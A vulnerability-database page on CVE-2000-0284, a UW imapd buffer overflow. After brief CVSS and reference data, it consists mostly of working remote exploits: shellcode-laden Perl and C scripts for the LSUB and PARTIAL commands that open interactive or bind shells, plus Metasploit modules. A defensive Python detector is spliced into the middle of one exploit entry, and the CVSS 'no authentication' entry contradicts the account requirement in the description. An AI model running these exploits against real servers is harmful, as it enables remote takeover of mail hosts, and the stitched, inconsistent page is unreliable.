CVE-2000-0284
CVSS 7.5
Published: 2000-04-16 00:00:00
Revised: 2008-09-10 15:04:00

[Original] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.


[CNNVD] University of Washington imapd buffer overflow vulnerability (CNNVD-200004-040)

University of Washington imapd version 4.7 contains a buffer overflow; users with a valid account can execute commands via LIST or other commands.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0284
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0284
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-040
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1110
(VENDOR_ADVISORY)  BID  1110
http://archives.neohapsis.com/archives/bugtraq/2000-04/0085.html
(UNKNOWN)  BUGTRAQ  20000416 imapd4r1 v12.264
http://archives.neohapsis.com/archives/bugtraq/2000-04/0074.html
(VENDOR_ADVISORY)  BUGTRAQ  20000416 imapd4r1 v12.264

- Vulnerability information

University of Washington imapd buffer overflow vulnerability
High risk  Buffer overflow
Published: 2000-04-16 00:00:00  Updated: 2005-10-20 00:00:00
Remote
University of Washington imapd version 4.7 contains a buffer overflow; users with a valid account can execute commands via LIST or other commands.

- Advisories and patches

        This is a historical vulnerability database entry. Fixes may have been released which address this issue, however they may have not been included in the database. The analyst team will be retroactively updating the information in the vulnerability report.

- Vulnerability information (253)

IMAP4rev1 10.190 Authentication Stack Overflow Exploit (EDBID:253)
Platform: linux  Type: remote
Date: 2001-01-19  Verified
Port: 143  Author: teleh0r
#!/usr/bin/perl

## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - just wrote it for fun.

$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
             "\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
             "\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
             "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
             "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
             "\x2f\x32\x39\x3e\x2f\x43\x38";


$len = 1052;       # Sufficient to overwrite the return value.
$nop = A;          # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.

if (@ARGV < 2) {
    print("Usage: $0 <target> <offset>\n");
    exit(1);
}

($target, $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";

system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");


# milw0rm.com [2001-01-19]

- Vulnerability information (284)

IMAP4rev1 12.261/12.264/2000.284 (lsub) Remote Exploit (EDBID:284)
Platform: linux  Type: remote
Date: 2001-03-03  Verified
Port: 143  Author: SkyLaZarT
/* 
 *			!!! Private !!!
 *
 *  imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
 *
 *  By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira
 *  Homepage: www.BufferOverflow.Org
 *  Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
 *		Antonio Marcelo and Felipe Saraiva
 *
 */


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

#define SIZE		1064
#define NOP		0x90
#define RET12261	0xbffff3ec
#define RET12264	0xbffff4e0
#define RET12264ZOOT	0xbffff697
#define RET2000_284	0xbfffebc8

#define INIT(x)	bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x)) 


#define TIMEOUT		20

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int debug = 0;


void openshell(int sock, int check);
void processSignal(int signum);

void processSignal(int signum) {
	fprintf(stderr, "Time out!!\n");
	exit(-1);
}


void openshell(int sock, int check) {
	char buffer[1024];
	fd_set rset;
	int i;
	
	while(1) {
		FD_ZERO(&rset);
		FD_SET(sock, &rset);
		FD_SET(fileno(stdin), &rset);

		select(sock + 1, &rset, NULL, NULL, NULL);

		if (FD_ISSET(sock, &rset)) {
			if ((i = read(sock, buffer, sizeof(buffer))) <= 0) {
				fprintf(stderr, "Connection terminated!\n");
				close(sock);
				exit(-1);
			} else {
				buffer[i] = 0x00;
				if(check) {
					if (!(strstr(buffer, "uid"))) {
						fprintf(stderr, "Exploit failed\n");
						exit(-1);
					} else {
						fprintf(stderr, "Exploit Success!!\n");
						check = 0;
					} 
				}

				puts(buffer);
			}
		}

		if (FD_ISSET(fileno(stdin), &rset)) {
			if ( check ) write(sock, "id\n", 3);
				
			if ((i = read(fileno(stdin), buffer, 
					sizeof(buffer))) > 0) {
				buffer[i] = 0x00;
				write(sock, buffer, i);
			}
		}
	}
}
				
				
int main(int argc, char **argv) {
	char buffer[SIZE], sockbuffer[2048];
	char *login, *password;
	long retaddr; 
	struct sockaddr_in sin;
	struct hostent *hePtr;
	int sock, i;	

	fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n"
		"Developed by SkyLaZarT - www.BufferOverflow.org\n\n");

	if ( argc < 5 ) {
		fprintf(stderr, "%s <host> <login> <password> <type> [offset]\n", argv[0]);
		fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n"
				"\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n"
				"\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n"
				"\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n");


		exit(-1);
	}

	login = argv[2];
	password = argv[3];

	switch(atoi(argv[4])) {
		case 0: retaddr = RET12261; break;
		case 1: retaddr = RET12264; break;
		case 2: retaddr = RET12264ZOOT; break;
		case 3: retaddr = RET2000_284; break;
		default: 
			fprintf(stderr, "invalid type.. assuming default " 
				"type 0\n");
			retaddr = RET12261; break;
			
	}

	if ( argc == 6 ) 
		retaddr += atoi(argv[5]);

	signal(SIGALRM, processSignal);	

	fprintf(stderr, "Trying to exploit %s...\n", argv[1]);

	fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode));


	alarm(TIMEOUT);
	hePtr = gethostbyname(argv[1]);
	if (!hePtr) {
		fprintf(stderr, "Unknow hostname : %s\n", strerror(errno));
		exit(-1);
	}
	alarm(0);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	if ( sock < 0 ) {
		perror("socket()");
		exit(-1);
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons(143);
	memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length);
	bzero(&(sin.sin_zero), 8);

	fprintf(stderr, "Connecting... "); 
	alarm(TIMEOUT);
	if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) {
		fprintf(stderr, "failed to %s:143\n", argv[1]);
		exit(-1);
	}
	alarm(0);	
	
	fprintf(stderr, "OK\n");

	
        for ( i = 0; i <= SIZE; i += 4 )
                *(long *)&buffer[i] = retaddr;

        for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ )
                *(buffer+i) = NOP;

        memcpy(buffer + i, shellcode, strlen(shellcode));

	INIT(sockbuffer);
	READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);	

	fprintf(stderr, "Trying to loging ... ");

	sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password);
	write(sock, sockbuffer, strlen(sockbuffer));
	
	INIT(sockbuffer);
	READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);
	
	if (!(strstr(sockbuffer, "OK LOGIN completed"))) {
		fprintf(stderr, "Login failed!!\n");
		close(sock);
		exit(-1);
	}

	fprintf(stderr, "OK\n");
	
	INIT(sockbuffer);
	sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n");
	write(sock, sockbuffer, strlen(sockbuffer));

        INIT(sockbuffer);
        READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);
	
	if(!(strstr(sockbuffer, "Ready"))) {
		fprintf(stderr, "LSUB command failed\n");
		close(sock);
		exit(-1);
	}	

	fprintf(stderr, "Sending shellcode... ");	
	
	write(sock, buffer, 1064);
	write(sock, "\r\n", 2);

	fprintf(stderr, "OK\n");
	
	fprintf(stderr, "PRESS ENTER for exploit status!!\n\n");	

	openshell(sock, 1);	
							
	close(sock);

	return 0;
}

// milw0rm.com [2001-03-03]

- Vulnerability information (397)

WU-IMAP 2000.287(1-2) Remote Exploit (EDBID:397)
Platform: linux  Type: remote
Date: 2002-06-25  Verified
Port: 143  Author: Teso
/* 7350owex- x86/linux WU-IMAP 2000.287(1-2) remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2002
* All Rights Reserved
*
*****************************************************************************
* bug found by scut 2002/06/25
* thanks to halvar,scut,typo,random,edi,xdr.
* special thanks to security.is.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"

char shellcode[] =
 "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
 "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
 "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
 "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
 "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
 "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80";

int main(int argc, char *argv[])
{
	int s, i;
	fd_set fds;
	char tmp[2048], buf[1060];
	char *target, *login, *pass, *p;
	struct sockaddr_in sock;
	unsigned long retaddr;

	fprintf(stderr, "%s\n", "7350owex by scut and zippo!");
	if (argc != 4)
	{
		fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>\n", argv[0]);
		exit(-1);
	}

	retaddr = RETADDR;
	target  = argv[1];
	login   = argv[2];
	pass    = argv[3];

	s = socket(AF_INET, SOCK_STREAM, 0);
	sock.sin_port = htons(143);
	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(target);

	printf("\nConnecting to %s:143...", target);
	fflush(stdout);
	if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
	{
		printf("failed\n");
		exit(-1);
	}
	else
		recv(s, tmp, sizeof(tmp), 0);

	printf("done\nLogging in...");
	fflush(stdout);
	snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %s\n", login, pass);
	send(s, tmp, strlen(tmp), 0);
	recv(s, tmp, sizeof(tmp), 0);

	if (!strstr(tmp, "completed"))
	{
		printf("failed\n");
		exit(-1);
	}

	printf("done\nExploiting...");
	fflush(stdout);

	dprintf(s, "A0666 SELECT %s/%s\n", MAILDIR, login);

	memset(buf, 0x0, sizeof(buf));
	p = buf;
	memset(p, 0x90, 928);
	p += 928;
	memcpy(p, shellcode, 100);
	p += 100;

	for (i=0; i<6; i++)
	{
		memcpy(p, &retaddr, 0x4);
		p += 0x4;
	}

	snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1\n", buf);
	send(s, tmp, strlen(tmp), 0);
	dprintf(s, "A0666 LOGOUT\n");
	sleep(5);
	printf("done\n\n");

	read(s, tmp, sizeof(tmp));
	dprintf(s, "uname -a;id;\n");
	memset(tmp, 0x0, sizeof(tmp));

	while (1)
	{
		FD_ZERO(&fds);
		FD_SET(s, &fds);
		FD_SET(1, &fds);

		select((s+1), &fds, 0, 0, 0);

		if (FD_ISSET(s, &fds))
		{
			if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
			{
				fprintf(stderr, "Connection closed\n");
				exit(0);
			}
			write(0, tmp, i);
		}
		if (FD_ISSET(1, &fds))
		{
			i = read(1, tmp, sizeof(tmp));
			send(s, tmp, i, 0);
		}
	}

	return 0;
}



// milw0rm.com [2002-06-25]

- Vulnerability information (10025)

University of Washington imap LSUB Buffer Overflow (EDBID:10025)
Platform: linux  Type: remote
Date: 2000-04-16  Verified
Port: 143  Author: patrick
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'UoW IMAP server LSUB Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the 'LSUB'
				command of the University of Washington IMAP service.
				This vulnerability can only be exploited with a valid username
				and password.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2000-0284' ],
					[ 'OSVDB', '12037' ],
					[ 'BID', '1110' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 964,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
					'Compat'   => 
						{
							'ConnectionType' => '-reverse',
						},
				},
			'Platform'       => 'linux',	
			'Targets'        => 
				[
					['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
				],
			'DisclosureDate' => 'Apr 16 2000',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /IMAP4rev1 v12.264/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe

	end

	def exploit
		connect_login

		print_status("Sending overflow string...")
		req = "a002 LSUB \"\" {1064}\r\n"
		sock.put(req)
		sleep(2)

		sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"

		sock.put(sploit)
		sleep(2)

		handler
		disconnect
	end

end

- Vulnerability information (16846)

UoW IMAP server LSUB Buffer Overflow (EDBID:16846)
Platform: linux  Type: remote
Date: 2010-03-26  Verified
Port: 0  Author: metasploit
##
# $Id: imap_uw_lsub.rb 8932 2010-03-26 19:00:23Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UoW IMAP server LSUB Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the 'LSUB'
				command of the University of Washington IMAP service.
				This vulnerability can only be exploited with a valid username
				and password.
			},
			'Author'         => [ 'patrick', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8932 $',
			'References'     =>
				[
					[ 'CVE', '2000-0284' ],
					[ 'OSVDB', '12037' ],
					[ 'BID', '1110' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 964,
					'BadChars' => "\x00\x0a\x0d\x2f",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'linux',
			'Targets'        =>
				[
					# ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
					[ 'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Offset'     => 1064,
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbffffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 200
								}
						},
					]
				],
			'DisclosureDate' => 'Apr 16 2000',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /IMAP4rev1 v12.264/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe

	end

	def brute_exploit(addresses)
		print_status("Trying 0x%.8x ..." % addresses['Ret'])

		if (not connect_login)
			raise RuntimeError, "Unable to log in!"
		end

		req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
		sock.put(req)
		buf = sock.get_once

		sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
		sock.put(sploit)

		handler
		disconnect
	end

end

- Vulnerability information (19847)

UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities (EDBID:19847)
Platform: unix  Type: remote
Date: 2002-08-01  Verified
Port: 0  Author: Gabriel A. Maggiotti
source: http://www.securityfocus.com/bid/1110/info

A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.

Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.

Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machine. 
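The description above names five commands (LIST, COPY, LSUB, RENAME, FIND) whose argument overruns a fixed-size buffer, and every exploit entry on this page delivers that argument as an IMAP literal ("{1064}" or "{1096}") followed by the raw octets. As an added example, not code from the page or from any project on it, the Python below scans a client-side IMAP trace and flags oversized arguments to those commands, whether announced as a literal or sent inline; the 512-octet threshold and the sample session are constructed assumptions.

```python
import re
from typing import Dict, List, Optional

# Commands whose mailbox-name argument overflowed a fixed-size stack buffer in
# UW imapd (LIST, and per BID 1110 also COPY, LSUB, RENAME and FIND).
VULNERABLE_COMMANDS = {"LIST", "LSUB", "COPY", "RENAME", "FIND"}

# Alert threshold in octets. Assumption for this example: the public exploits
# on this page announce literals of 1064 and 1096 octets, so 512 leaves margin
# without flagging ordinary mailbox names.
LITERAL_THRESHOLD = 512

# "<tag> <COMMAND> <arguments>"; an IMAP tag is any run of non-space characters.
_CMD_RE = re.compile(r"^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)(?P<rest>.*)$")
# A literal introducer "{N}" (or "{N+}" for LITERAL+) closing the line: the
# client then sends N raw octets, which is how the exploits on this page
# deliver their payload.
_LITERAL_RE = re.compile(r"\{(?P<n>\d+)\+?\}$")


def parse_command(line: str) -> Optional[Dict]:
    """Split one client line into tag, upper-cased command, argument text and,
    when the line ends in a literal introducer, the announced octet count."""
    m = _CMD_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    rest = m.group("rest").strip()
    lit = _LITERAL_RE.search(rest)
    return {
        "tag": m.group("tag"),
        "cmd": m.group("cmd").upper(),
        "rest": rest,
        "literal": int(lit.group("n")) if lit else None,
    }


def scan_session(client_lines: List[str], threshold: int = LITERAL_THRESHOLD) -> List[str]:
    """Return one alert per client line that sends an oversized argument to one
    of the overflow-prone commands, whether announced as a literal or inline.

    The exploits on this page send the literal's octets as a single line after
    the "{N}" announcement, so the line following an announcement is treated as
    raw literal data and never parsed as a command.
    """
    alerts: List[str] = []
    literal_pending = False
    for lineno, line in enumerate(client_lines, 1):
        if literal_pending:
            literal_pending = False  # raw octets of the announced literal
            continue
        p = parse_command(line)
        if p is None:
            continue
        literal_pending = p["literal"] is not None
        if p["cmd"] not in VULNERABLE_COMMANDS:
            continue
        if p["literal"] is not None and p["literal"] >= threshold:
            alerts.append(
                f"line {lineno}: {p['cmd']} (tag {p['tag']}) announces a "
                f"{p['literal']}-octet literal argument"
            )
        elif len(p["rest"]) >= threshold:
            alerts.append(
                f"line {lineno}: {p['cmd']} (tag {p['tag']}) carries a "
                f"{len(p['rest'])}-byte inline argument"
            )
    return alerts


# Constructed client-side trace: a normal login and LIST, then the LSUB literal
# size the exploits above use (1064 octets of filler standing in for a payload),
# then an inline COPY argument of the size the COPY module on this page uses.
SAMPLE_SESSION = [
    "a001 LOGIN alice secret\r\n",
    'a002 LIST "" "INBOX.*"\r\n',
    'a003 LSUB "" {1064}\r\n',
    "A" * 1064 + "\r\n",
    "a004 COPY 1:3 " + "B" * 1096 + "\r\n",
    "a005 LOGOUT\r\n",
]

if __name__ == "__main__":
    for alert in scan_session(SAMPLE_SESSION):
        print(alert)
```

A LOGIN with a large literal is deliberately not flagged, since the page ties the overflow to the mailbox-name commands only; widen VULNERABLE_COMMANDS if a deployment needs broader coverage.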

/*
------------------------------------------------------------------------------
Web:  http://qb0x.net                           Author: Gabriel A. Maggiotti
Date: Aug 01, 2002                            E-mail: gmaggiot@ciudad.com.ar
------------------------------------------------------------------------------

Redhat 7.0 remote buffer overflow exploit for IMAP4rev1 prior to v10.234


*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX     1200
#define MYPORT   143
#define PORT    30464

#define OFFSET 1080
#define NOP 0x90
#define RET 0xbffd8940 - OFFSET


char shellcode[]=
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\xcd\x80"                      /* int $0x80             */
        "\x85\xc0"                      /* testl %eax,%eax       */
        "\x75\x43"                      /* jne 0x43              */
        "\xeb\x43"                      /* jmp 0x43              */
        "\x5e"                          /* popl %esi             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xf1"                      /* movl %esi,%ecx        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x06"                      /* movb $0x6,%al         */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x01"                      /* movb $0x1,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
        "\xb0\x77"                      /* movb $0x77,%al        */
        "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
        "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
        "\xb0\x10"                      /* movb $0x10,%al        */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x02"                      /* movb $0x2,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xeb\x04"                      /* jmp 0x4               */
        "\xeb\x55"                      /* jmp 0x55              */
        "\xeb\x5b"                      /* jmp 0x5b              */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x04"                      /* movb $0x4,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x05"                      /* movb $0x5,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x88\xc3"                      /* movb %al,%bl          */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\x31\xc9"                      /* xorl %ecx,%ecx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x01"                      /* movb $0x1,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x02"                      /* movb $0x2,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\x5b\xff\xff\xff";         /* call -0xa5            */

int main(int argc, char *argv[])
{
	int i=0;
	char buf[MAX];
	int sockfd;
    int numbytes;

    struct hostent *he;
    struct sockaddr_in their_addr;

    if(argc!=4)
    {
		fprintf(stderr,"usage:%s <hostname> <user> <pass>\n",argv[0]);
		exit(1);
	}

    if((he=gethostbyname(argv[1]))==NULL)
    {
		perror("gethostbyname");
		exit(1);
	}

	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(MYPORT);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	if( connect(sockfd,(struct sockaddr*)&their_addr,\
                 sizeof(struct sockaddr))==-1)
	{
		perror("connect");
		exit(1);
	}

	sprintf(buf,"1 LOGIN %s %s\r\n1 LSUB \"\" {1064}\r\n",argv[2],argv[3]);
	printf("%s",buf);

	for(i=0;i<=OFFSET -1 ;i++)
		buf[i]=NOP;
	for(;i<OFFSET+32;i+=4)
	*(int *) &buf[i] = RET;
//	*(int *) &buf[i+=4] = RET1;
	memcpy(buf+100,shellcode,strlen(shellcode));

    if( send(sockfd,buf,strlen(buf),0) ==-1)
    {
    	perror("send");
        exit(0);
    }

    close(sockfd);

/***************** second connection  ************************/
	sleep(2);

	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(PORT);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	if( connect(sockfd,(struct sockaddr*)&their_addr,\
                 sizeof(struct sockaddr))==-1)
    {
   		 perror("connect");
    	 exit(1);
    }

   	printf("sh> ");
	while(1)
	{
		buf[0]='\0';
		fgets(buf,MAX-1,stdin);
		sprintf(buf,"%s \n",buf);
		//printf("%s\n",buf);
        if( send(sockfd,buf,strlen(buf),0) ==-1)
        {
                perror("send");
                exit(0);
        }

		buf[0]='\0';
        if( (numbytes=recv(sockfd,buf,MAX,0))==-1 ) {
	            perror("recv");
	            exit(1);
	        }

        buf[numbytes]='\0';
       	printf("%s\nsh> ",buf);

	}
    close(sockfd);

return 0;
}


- Vulnerability information (19848)

UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta) (EDBID:19848)
Platform: unix  Type: remote
Date: 2000-04-16  Verified
Port: 0  Author: vlad902
source: http://www.securityfocus.com/bid/1110/info

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

